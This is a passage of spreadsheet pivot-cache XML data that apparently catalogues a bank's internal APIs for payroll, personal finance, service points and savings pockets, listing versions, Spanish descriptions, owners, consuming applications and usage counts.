    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="3"/>
    <m/>
    <n v="874"/>
    <n v="1440"/>
    <n v="2305"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-02-28T16:58:49"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Customers enrollment"/>
    <n v="102"/>
    <s v="payroll-management-customers-enrollment"/>
    <s v="Gestión de enrolamiento de clientes, con esta API se puede enrolar un cliente(pyme, empresa...) al procduto de gestion de nominas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="3"/>
    <n v="1"/>
    <n v="886"/>
    <n v="1457"/>
    <n v="1519"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-03-18T20:29:09"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Employees"/>
    <n v="102"/>
    <s v="payroll-management-employees"/>
    <s v="Gestión de los empleados de la empresa, con esta API se pueden crear, consultar, modificar y eliminar empleados de una empresa en el producto de gestion de nomina, los empleados estan relacionados con una empresa, uno o varios contratos y salarios."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="49"/>
    <n v="62"/>
    <n v="1144"/>
    <n v="2098"/>
    <n v="2827"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-03-18T20:29:09"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Locations"/>
    <n v="103"/>
    <s v="payroll-management-locations"/>
    <s v="Gestión de las sedes de la empresa, con esta API se pueden crear, consultar, modificar y eliminar sedes de una empresa en el producto de gestion de nomina."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="29"/>
    <n v="21"/>
    <n v="1002"/>
    <n v="1787"/>
    <n v="2531"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-02-28T16:58:49"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Payroll concepts"/>
    <n v="101"/>
    <s v="payroll-management-payroll-concepts"/>
    <s v="Permite la gestión de los conceptos de nómina, estos son los diferentes conceptos que se usan para agregar novedades a la nómina e identificar los diferentes valores que corresponden. Estos pueden ser generales a nivel nacional que aplican para todas las empresas como salud, pensión, etc. y hay otros que pueden ser creados por las empresas de manera especí­fica. Inicialmente solo se podrán consultar los conceptos de nómina generales a nivel nacional pero posteriormente podrí­a implementarse gestion de conceptos especí­ficos para cada empresa."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="7"/>
    <n v="8"/>
    <n v="932"/>
    <n v="1490"/>
    <n v="2344"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-03-18T20:29:09"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Payroll novelties management"/>
    <n v="102"/>
    <s v="payroll-management-payroll-novelties-management"/>
    <s v="Gestión de las novedades de nómina de una empresa, con esta API se pueden crear, consultar y modificar elementos de nómina diferentes tipos. Los elementos de nómina son los que permiten agregar novedades salariales, no salariales o deducciones a una nómina y están directamente relacionados a un concepto de nómina, estas pueden ser recurrentes, es decir de ejecución periódico o aplicables a una nómina especifica de un periodo."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="12"/>
    <n v="34"/>
    <n v="917"/>
    <n v="1633"/>
    <n v="2474"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-02-28T16:58:49"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Payrolls"/>
    <n v="101"/>
    <s v="payroll-management-payrolls"/>
    <s v="Permite la consulta y actualización de la nomina especifica de un empleado, en la nómina esta toda la información de lo pagado al empleado, sus deducciones, retenciones, aportes a seguridad social entre otros. Inicialmente solos se habilita el metodo para consulta de colilla de pago pero posteriormente se habilitarán los demas metodos de consulta y modificación."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <n v="4"/>
    <n v="880"/>
    <n v="1444"/>
    <n v="1509"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-02-28T16:58:49"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Periods"/>
    <n v="101"/>
    <s v="payroll-management-periods"/>
    <s v="Permite la consulta de los perí­odos de liquidación de la nómina de una empresa, los perí­odos hacen referencia al tiempo en el cual se liquida la nómina de la empresa, estos pueden ser quincenales o mensuales dependiendo de la configuración de la empresa. Los endpoints de perí­odo permiten consultar el listado de los perí­odos de la empresa o consultar la información especí­fica de cada uno."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="43"/>
    <n v="112"/>
    <n v="1165"/>
    <n v="2296"/>
    <n v="3012"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-03-18T20:29:09"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Subscription payment management"/>
    <n v="102"/>
    <s v="payroll-management-subscription-payment-management"/>
    <s v="API que permite la gestión del pago de la suscripción de las empresas que utilizan el producto de gestion nomina. Inicialmente se expone endpoint para enviar la cuenta desde la cual se realizará el debito automatico para el pago."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="872"/>
    <n v="1440"/>
    <n v="2298"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-08-22T17:21:53"/>
    <s v="Tec- Personal Finance"/>
    <n v="132"/>
    <s v="Personal finance  Admin - Management"/>
    <n v="120"/>
    <s v="personal-finance-admin-management"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Específicamente al manejo de sus gastos. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorías de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente. "/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-26T14:38:30"/>
    <s v="Personal Finance"/>
    <n v="110"/>
    <s v="Personal Finance - Admin Management"/>
    <n v="210"/>
    <s v="personal-finance-admin-management"/>
    <s v="No tiene Descipcion"/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <m/>
    <n v="1"/>
    <n v="1"/>
    <n v="3"/>
    <n v="2"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - Admin Management"/>
    <n v="243"/>
    <s v="personal-finance-admin-management"/>
    <s v="Esta API está orientada al seguimiento administrativo del módulo de FINANZAS PERSONALES de los clientes del banco. Permitiendo controlar y tener registro de todas las actividades realizadas por los clientes en los distintos módulos."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <n v="1"/>
    <n v="1"/>
    <n v="3"/>
    <n v="2"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="110"/>
    <s v="Personal Finance - Budget"/>
    <n v="100"/>
    <s v="personal-finance-budget"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de su presupuesto. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder guardar el presupuesto de gastos, ingresos y ahorros de un mes y un periodo de tiempo que determine. A este presupuesto mes a mes, o segíºn se desee, puede ser modificado, y ajustar segíºn los planes financieros de cada cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <m/>
    <n v="125"/>
    <n v="363"/>
    <n v="350"/>
    <n v="2534"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-26T14:38:30"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - Budget"/>
    <n v="203"/>
    <s v="personal-finance-budget"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de su presupuesto. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder guardar el presupuesto de gastos, ingresos y ahorros de un mes y un periodo de tiempo que determine. A este presupuesto mes a mes, o segíºn se desee, puede ser modificado, y ajustar segíºn los planes financieros de cada cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <n v="125"/>
    <n v="363"/>
    <n v="350"/>
    <n v="2534"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-08-22T17:21:53"/>
    <s v="Tec- Personal Finance"/>
    <n v="132"/>
    <s v="Personal finance  Cash - Management"/>
    <n v="110"/>
    <s v="personal-finance-cash-management"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Específicamente al manejo de sus gastos. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorías de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente. "/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="110"/>
    <s v="Personal Finance - Cash Management"/>
    <n v="200"/>
    <s v="personal-finance-cash-management"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de su efectivo. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para tener registro de los movimientos de efectivo que haga el cliente, tales como: creación, actualización y modificación de las transacciones en efectivo. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="10475"/>
    <n v="10354"/>
    <n v="10126"/>
    <n v="12820"/>
    <n v="11459"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-26T14:38:30"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - Cash Management"/>
    <n v="214"/>
    <s v="personal-finance-cash-management"/>
    <s v="No tiene Descipcion"/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="10475"/>
    <n v="10354"/>
    <n v="10126"/>
    <n v="12820"/>
    <n v="11459"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-08-22T17:21:53"/>
    <s v="Tec- Personal Finance"/>
    <n v="132"/>
    <s v="Personal finance  CreditCard - Management"/>
    <n v="110"/>
    <s v="personal-finance-creditcard-management"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Específicamente al manejo de sus gastos, realizados a través de su(s) tarjetas de crédito. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorías de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - CreditCard Management"/>
    <n v="114"/>
    <s v="personal-finance-creditcard-management"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de sus gastos, realizados a través de su(s) tarjetas de crédito. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorí­as de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="118412"/>
    <n v="101479"/>
    <n v="96317"/>
    <n v="118536"/>
    <n v="109208"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-08-22T17:21:53"/>
    <s v="Tec- Personal Finance"/>
    <n v="132"/>
    <s v="Personal finance  Expenses - Management"/>
    <n v="110"/>
    <s v="personal-finance-expenses-management"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Específicamente al manejo de sus gastos. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorías de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente. "/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <n v="268"/>
    <n v="513"/>
    <n v="5470"/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - Expenses Management"/>
    <n v="114"/>
    <s v="personal-finance-expenses-management"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de sus gastos. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorí­as de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="783386"/>
    <n v="694063"/>
    <n v="680729"/>
    <n v="948563"/>
    <n v="893550"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-08-22T17:21:53"/>
    <s v="Tec- Personal Finance"/>
    <n v="132"/>
    <s v="Personal finance  Incomes - Management"/>
    <n v="110"/>
    <s v="personal-finance-incomes-management"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Específicamente al manejo de su efectivo. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para tener registro de los movimientos de efectivo que haga el cliente, tales como: creación, actualización y modificación de las transacciones en efectivo. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - Incomes Management"/>
    <n v="114"/>
    <s v="personal-finance-incomes-management"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de su efectivo. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para tener registro de los movimientos de efectivo que haga el cliente, tales como: creación, actualización y modificación de las transacciones en efectivo. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="239214"/>
    <n v="214363"/>
    <n v="207885"/>
    <n v="251192"/>
    <n v="235245"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - Reports"/>
    <n v="103"/>
    <s v="personal-finance-reports"/>
    <s v="Esta API está orientada a la reporteria general de las finanzas personales. Permitiendo consultas valores generales, como el estado actual de las finanzas: total de gastos, total de ingresos, total de gastos con tarjetas de crédito, entre otros."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <m/>
    <m/>
    <m/>
    <n v="8"/>
    <n v="954"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-08-22T17:21:53"/>
    <s v="Tec- Personal Finance"/>
    <n v="132"/>
    <s v="Personal finance  Terms"/>
    <n v="110"/>
    <s v="personal-finance-terms"/>
    <s v="Esta API está orientada a la administración de los términos y condiciones que rige al módulo de finanzas personales. Controlando la versión actual y el histórico de versiones que tiene el módulo.   _x000a__x000a_De igual manera, se puede hacer registro y la consulta de los clientes que han aceptado los términos y condiciones para el uso de las finanzas personales en los distintos canales del banco. "/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="110"/>
    <s v="Personal Finance - Terms"/>
    <n v="200"/>
    <s v="personal-finance-terms"/>
    <s v="Esta API está orientada a la administración de los términos y condiciones que rige al módulo de finanzas personales. Controlando la versión actual y el histórico de versiones que tiene el módulo.  De igual manera, se puede hacer registro y la consulta de los clientes que han aceptado los términos y condiciones para el uso de las finanzas personales en los distintos canales del banco."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="550386"/>
    <n v="481375"/>
    <n v="456168"/>
    <n v="552002"/>
    <n v="548885"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-26T14:38:30"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - Terms"/>
    <n v="214"/>
    <s v="personal-finance-terms"/>
    <s v="No tiene Descipcion"/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="550386"/>
    <n v="481375"/>
    <n v="456168"/>
    <n v="552002"/>
    <n v="548885"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="PG_IC_GESTIONCODIGOAUTORIZACION_GCU"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="CLR (CLARO)_x000a_TLP (Teleperformance)_x000a_KNT (KONECTA)_x000a_BOT (TABOOT BANCOLOMBIA)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-12T14:06:43"/>
    <s v="Physical Point Network"/>
    <n v="100"/>
    <s v="Physical Point Network - Service Points"/>
    <n v="100"/>
    <s v="physical-point-network-service-points"/>
    <s v="La API Service points tiene el objetivo de consultar los puntos fí­sicos de Bancolombia, como lo son sucursales,  corresponsales bancarios y cajeros electrónicos.    La consulta a los puntos fí­sicos se debe hacer por la latitud, longitud y radio del cliente ya sea de su ubicación en tiempo real o de la ubicación que el desee; con esto podemos obtener información de ubicación y que servicios prestan cada uno de los puntos./ "/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Sucursales"/>
    <s v="Distribución Fisica"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="ALM_AW0955001"/>
    <m/>
    <n v="385"/>
    <n v="64217"/>
    <n v="21887"/>
    <n v="29389"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-18T16:43:56"/>
    <s v="Physical Point Network"/>
    <n v="110"/>
    <s v="Physical Point Network - Service Points"/>
    <n v="110"/>
    <s v="physical-point-network-service-points"/>
    <s v="La API Service points tiene el objetivo de consultar los puntos fí­sicos de Bancolombia, como lo son sucursales,  corresponsales bancarios y cajeros electrónicos.    La consulta a los puntos fí­sicos se debe hacer por la latitud, longitud y radio del cliente ya sea de su ubicación en tiempo real o de la ubicación que el desee; con esto podemos obtener información de ubicación y que servicios prestan cada uno de los puntos./ "/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Sucursales"/>
    <s v="Distribución Fisica"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="ALM_AW0955001"/>
    <m/>
    <n v="385"/>
    <n v="64217"/>
    <n v="21887"/>
    <n v="29389"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-01-18T17:31:37"/>
    <s v="Pockets"/>
    <n v="141"/>
    <s v="Pocket - Information"/>
    <n v="113"/>
    <s v="pocket-information"/>
    <s v="Habilita las capacidades de consulta de bolsillos como listar las diferentes categorí­as por las cuales se puede separar el dinero, consultar los bolsillos de una cuenta en especí­fico, consultar el detalle de un bolsillo."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="ConsultaInformacionBolsillos/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="3210"/>
    <n v="3236"/>
    <n v="2718"/>
    <n v="2532"/>
    <n v="3876"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-01-18T17:31:37"/>
    <s v="Pockets"/>
